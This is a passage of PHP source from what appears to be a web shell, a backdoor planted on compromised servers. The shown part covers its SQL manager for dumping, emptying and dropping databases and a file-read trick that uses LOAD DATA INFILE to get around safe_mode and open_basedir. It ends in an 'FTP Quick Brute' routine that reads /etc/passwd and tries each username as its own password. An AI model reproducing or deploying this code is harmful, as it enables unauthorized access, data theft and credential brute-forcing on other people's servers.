  600. $c++;
  601. }
  602. echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
  603. echo $dbs;
  604. }
  605. ?>
  606. </select>
  607. </form>
  608. </center>
  609. <hr size="1" noshade>
  610. <?php
  611. if (isset($sql_db)) {
  612. $result = mysql_list_tables($sql_db);
  613. if (!$result) { echo mysql_smarterror($sql_sock); }
  614. else {
  615. echo "\t-=[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]=-<br><br>\n";
  616. $c = 0;
  617. while ($row = mysql_fetch_array($result)) {
  618. $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
  619. $count_row = mysql_fetch_array($count);
  620. echo "\t<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
  621. mysql_free_result($count);
  622. $c++;
  623. }
  624. if (!$c) { echo "No tables found in database"; }
  625. }
  626. }
  627. ?>
  628. </td>
  629. <td>
  630. <?php
  631. #Start center panel
  632. $diplay = TRUE;
  633. if (@$sql_db) {
  634. if (!is_numeric($c)) { $c = 0; }
  635. if ($c == 0) { $c = "no"; }
  636. echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
  637. if (count(@$dbquicklaunch) > 0) {
  638. foreach($dbsqlquicklaunch as $item) {
  639. echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
  640. }
  641. }
  642. echo "</b></center>\n";
  643. $acts = array("","dump");
  644. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  645. elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  646. elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  647. elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  648. elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  649. elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  650. elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  651. elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  652. elseif ($sql_tbl_act == "insert") {
  653. if ($sql_tbl_insert_radio == 1) {
  654. $keys = "";
  655. $akeys = array_keys($sql_tbl_insert);
  656. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  657. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  658. $values = "";
  659. $i = 0;
  660. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  661. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  662. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  663. $sql_act = "query";
  664. $sql_tbl_act = "browse";
  665. }
  666. elseif ($sql_tbl_insert_radio == 2) {
  667. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  668. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  669. $result = mysql_query($sql_query) or print(mysql_smarterror());
  670. $result = mysql_fetch_array($result, MYSQL_ASSOC);
  671. $sql_act = "query";
  672. $sql_tbl_act = "browse";
  673. }
  674. }
  675. if ($sql_act == "query") {
  676. echo "<hr size=\"1\" noshade>";
  677. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  678. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  679. if ((!$submit) or ($sql_act)) { echo "<table><tr><td><form action=\"".$sql_surl."\" method=\"post\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
  680. }
  681. if (in_array($sql_act,$acts)) {
  682. ?>
  683. <table>
  684. <tr>
  685. <td>
  686. <b>Create new table:</b>
  687. <form action="<?php echo $surl; ?>">
  688. <input type="hidden" name="act" value="sql">
  689. <input type="hidden" name="sql_act" value="newtbl">
  690. <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  691. <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  692. <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  693. <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  694. <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  695. <input type="text" name="sql_newtbl" size="20">
  696. Fields: <input type="text" name="sql_field" size="3">
  697. <input type="submit" value="Create">
  698. </form>
  699. </td>
  700. <td><b>Dump DB:</b>
  701. <form action="<?php echo $surl; ?>">
  702. <input type="hidden" name="act" value="sql">
  703. <input type="hidden" name="sql_act" value="dump">
  704. <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  705. <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  706. <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  707. <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  708. <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  709. <input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">
  710. <input type="submit" name="submit" value="Dump">
  711. </form>
  712. </td>
  713. </tr>
  714. </table>
  715. <?php
  716. if (!empty($sql_act)) { echo "<hr size=\"1\" noshade>"; }
  717. if ($sql_act == "newtbl") {
  718. echo "<b>";
  719. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
  720. echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  721. }
  722. else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
  723. }
  724. elseif ($sql_act == "dump") {
  725. if (empty($submit)) {
  726. $diplay = FALSE;
  727. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  728. echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  729. $v = join (";",$dmptbls);
  730. echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  731. if ($dump_file) {$tmp = $dump_file;}
  732. else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  733. echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  734. echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  735. echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  736. echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  737. echo "</form>";
  738. }
  739. else {
  740. $diplay = TRUE;
  741. $set = array();
  742. $set["sock"] = $sql_sock;
  743. $set["db"] = $sql_db;
  744. $dump_out = "download";
  745. $set["print"] = 0;
  746. $set["nl2br"] = 0;
  747. $set[""] = 0;
  748. $set["file"] = $dump_file;
  749. $set["add_drop"] = TRUE;
  750. $set["onlytabs"] = array();
  751. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  752. $ret = mysql_dump($set);
  753. if ($sql_dump_download) {
  754. @ob_clean();
  755. header("Content-type: application/octet-stream");
  756. header("Content-length: ".strlen($ret));
  757. header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  758. echo $ret;
  759. exit;
  760. }
  761. elseif ($sql_dump_savetofile) {
  762. $fp = fopen($sql_dump_file,"w");
  763. if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  764. else {
  765. fwrite($fp,$ret);
  766. fclose($fp);
  767. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  768. }
  769. }
  770. else {echo "<b>Dump: nothing to do!</b>";}
  771. }
  772. }
  773. if ($diplay) {
  774. if (!empty($sql_tbl)) {
  775. if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  776. $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  777. $count_row = mysql_fetch_array($count);
  778. mysql_free_result($count);
  779. $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  780. $tbl_struct_fields = array();
  781. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  782. if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
  783. if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
  784. if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
  785. if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
  786. $perpage = $sql_tbl_le - $sql_tbl_ls;
  787. if (!is_numeric($perpage)) { $perpage = 10; }
  788. $numpages = $count_row[0]/$perpage;
  789. $e = explode(" ",$sql_order);
  790. if (count($e) == 2) {
  791. if ($e[0] == "d") { $asc_desc = "DESC"; }
  792. else { $asc_desc = "ASC"; }
  793. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  794. }
  795. else {$v = "";}
  796. $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  797. $result = mysql_query($query) or print(mysql_smarterror());
  798. echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  799. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> &nbsp; ";
  800. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> &nbsp; ";
  801. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";
  802. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";
  803. if ($sql_tbl_act == "structure") { echo "<b>Under construction!</b>"; }
  804. if ($sql_tbl_act == "insert") {
  805. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  806. if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
  807. else {
  808. echo "<br><br><b>Inserting row into table:</b><br>";
  809. if (!empty($sql_tbl_insert_q)) {
  810. $sql_query = "SELECT * FROM `".$sql_tbl."`";
  811. $sql_query .= " WHERE".$sql_tbl_insert_q;
  812. $sql_query .= " LIMIT 1;";
  813. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  814. $values = mysql_fetch_assoc($result);
  815. mysql_free_result($result);
  816. }
  817. else {$values = array();}
  818. echo "<form method=\"post\"><table width=\"1%\"><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  819. foreach ($tbl_struct_fields as $field) {
  820. $name = $field["Field"];
  821. if (empty($sql_tbl_insert_q)) {$v = "";}
  822. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  823. $i++;
  824. }
  825. echo "</table><br>";
  826. echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  827. if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  828. echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  829. }
  830. }
  831. if ($sql_tbl_act == "browse") {
  832. $sql_tbl_ls = abs($sql_tbl_ls);
  833. $sql_tbl_le = abs($sql_tbl_le);
  834. echo "<hr size=\"1\" noshade>";
  835. echo "<img src=\"".$surl."act=img&img=multipage\" alt=\"Pages\"> ";
  836. $b = 0;
  837. for($i=0;$i<$numpages;$i++) {
  838. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  839. echo $i;
  840. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  841. if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  842. else { echo " "; }
  843. }
  844. if ($i == 0) {echo "empty";}
  845. echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
  846. echo "<br><form method=\"post\">\n";
  847. echo "<table><tr>";
  848. echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  849. for ($i=0;$i<mysql_num_fields($result);$i++) {
  850. $v = mysql_field_name($result,$i);
  851. if ($e[0] == "a") {$s = "d"; $m = "asc";}
  852. else {$s = "a"; $m = "desc";}
  853. echo "<td>";
  854. if (empty($e[0])) {$e[0] = "a";}
  855. if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  856. else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
  857. echo "</td>";
  858. }
  859. echo "<td><font color=\"green\"><b>Action</b></font></td>";
  860. echo "</tr>";
  861. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
  862. echo "<tr>";
  863. $w = "";
  864. $i = 0;
  865. foreach ($row as $k=>$v) {
  866. $name = mysql_field_name($result,$i);
  867. $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
  868. }
  869. if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
  870. echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  871. $i = 0;
  872. foreach ($row as $k=>$v) {
  873. $v = htmlspecialchars($v);
  874. if ($v == "") { $v = "<font color=\"green\">NULL</font>"; }
  875. echo "<td>".$v."</td>";
  876. $i++;
  877. }
  878. echo "<td>";
  879. echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a> ";
  880. echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
  881. echo "</td>";
  882. echo "</tr>";
  883. }
  884. mysql_free_result($result);
  885. echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" alt=\" ^ \"><select name=\"sql_act\">";
  886. echo "<option value=\"\">With selected:</option>";
  887. echo "<option value=\"deleterow\">Delete</option>";
  888. echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
  889. }
  890. }
  891. else {
  892. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  893. if (!$result) { echo mysql_smarterror(); }
  894. else {
  895. ?>
  896. <form method="post">
  897. <table>
  898. <tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>
  899. <?php
  900. $i = 0;
  901. $tsize = $trows = 0;
  902. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
  903. $tsize += $row["Data_length"];
  904. $trows += $row["Rows"];
  905. $size = view_size($row["Data_length"]);
  906. ?>
  907. <tr>
  908. <td><input type="checkbox" name="boxtbl[]" value="<?php echo $row["Name"]; ?>"></td>
  909. <td><a href="<?php echo $sql_surl; ?>sql_tbl=<?php echo urlencode($row["Name"]); ?>"><b><?php echo $row["Name"]; ?></b></a></td>
  910. <td><?php echo $row["Rows"]; ?></td><td><?php echo $row["Engine"]; ?></td><td><?php echo $row["Create_time"]; ?></td><td><?php echo $row["Update_time"]; ?></td><td><?php echo $size; ?></td>
  911. <td><a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DELETE FROM `".$row["Name"]."`"); ?>">Empty</a>&nbsp;<a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DROP TABLE `".$row["Name"]."`"); ?>">Drop</a>&nbsp;<a href="<?php echo $sql_surl; ?>sql_tbl_act=insert&sql_tbl=<?php echo $row["Name"]; ?>">Insert</a></td>
  912. </tr>
  913. <?php
  914. $i++;
  915. }
  916. echo "\t\t<tr>\n".
  917. "\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
  918. ?>
  919. </tr>
  920. </table>
  921. <div align="right">
  922. <select name="sql_act">
  923. <option value="">With selected:</option>
  924. <option value="tbldrop">Drop</option>
  925. <option value="tblempty">Empty</option>";
  926. <option value="tbldump">Dump</option>";
  927. <option value="tblcheck">Check table</option>";
  928. <option value="tbloptimize">Optimize table</option>";
  929. <option value="tblrepair">Repair table</option>";
  930. <option value="tblanalyze">Analyze table</option>";
  931. </select>
  932. <input type="submit" value="Confirm">
  933. </div>
  934. </form>
  935. <?php
  936. mysql_free_result($result);
  937. }
  938. }
  939. }
  940. }
  941. }
  942. else {
  943. $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  944. if (in_array($sql_act,$acts)) {
  945. ?>
  946. <table>
  947. <tr>
  948. <td><b>Create new DB:</b>
  949. <form action="<?php echo $surl; ?>">
  950. <input type="hidden" name="act" value="sql">
  951. <input type="hidden" name="sql_act" value="newdb">
  952. <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  953. <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  954. <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  955. <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  956. <input type="text" name="sql_newdb" size="20">
  957. <input type="submit" value="Create">
  958. </form>
  959. </td>
  960. <td><b>View File:</b>
  961. <form action="<?php echo $surl; ?>">
  962. <input type="hidden" name="act" value="sql">
  963. <input type="hidden" name="sql_act" value="getfile">
  964. <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  965. <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  966. <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  967. <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  968. <input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">
  969. <input type="submit" value="Get">
  970. </form>
  971. </td>
  972. </tr>
  973. </table>
  974. <?php
  975. }
  976. ##[ SQL ACTIONS ]##
  977. if (!empty($sql_act)) {
  978. echo "<hr size=\"1\" noshade>";
  979. if ($sql_act == "newdb") {
  980. echo "<b>";
  981. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  982. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  983. }
  984. if ($sql_act == "serverstatus") {
  985. $result = mysql_query("SHOW STATUS", $sql_sock);
  986. echo "<center><b>Server-status variables:</b><br><br>";
  987. echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
  988. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  989. echo "</table></center>";
  990. mysql_free_result($result);
  991. }
  992. if ($sql_act == "servervars") {
  993. $result = mysql_query("SHOW VARIABLES", $sql_sock);
  994. echo "<center><b>Server variables:</b><br><br>";
  995. echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
  996. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  997. echo "</table>";
  998. mysql_free_result($result);
  999. }
  1000. if ($sql_act == "processes") {
  1001. if (!empty($kill)) {
  1002. $query = "KILL ".$kill.";";
  1003. $result = mysql_query($query, $sql_sock);
  1004. echo "<b>Process #".$kill." was killed.</b>";
  1005. }
  1006. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1007. echo "<center><b>Processes:</b><br><br>";
  1008. echo "<table><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1009. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1010. echo "</table>";
  1011. mysql_free_result($result);
  1012. }
  1013. if ($sql_act == "getfile") {
  1014. $tmpdb = $sql_login."_tmpdb";
  1015. $select = mysql_select_db($tmpdb);
  1016. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1017. if ($select) {
  1018. $created = FALSE;
  1019. mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1020. mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1021. $result = mysql_query("SELECT * FROM tmp_file;");
  1022. if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1023. else {
  1024. for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
  1025. $f = "";
  1026. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
  1027. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1028. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1029. mysql_free_result($result);
  1030. mysql_query("DROP TABLE tmp_file;");
  1031. }
  1032. }
  1033. mysql_drop_db($tmpdb);
  1034. }
  1035. }
  1036. }
  1037. }
  1038. ?>
  1039. </td>
  1040. </tr>
  1041. <?php
  1042. if ($sql_sock) {
  1043. $affected = @mysql_affected_rows($sql_sock);
  1044. if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
  1045. echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
  1046. }
  1047. ?>
  1048. </table>
  1049. <!-- End of SQL Manager -->
  1050. <?php
  1051. }
  1052. if ($act == "ftpquickbrute") {
  1053. bar_header(".: Ftp Quick Brute :.");
  1054. echo "<table>\n";
  1055. echo "<tr><td>";
  1056. if (!empty($submit)) {
  1057. if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1058. $fp = fopen("/etc/passwd","r");
  1059. if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1060. else {
  1061. if ($fqb_logging) {
  1062. if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1063. else {$fqb_logfp = FALSE;}
  1064. $fqb_log = "FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1065. if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1066. }
  1067. @ob_flush();
  1068. $i = $success = 0;
  1069. $ftpquick_st = getmicrotime();
  1070. while(!feof($fp)) {
  1071. $str = explode(":",fgets($fp,2048));
  1072. if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
  1073. echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1074. $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1075. if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1076. $success++;
  1077. ob_flush();
  1078. }
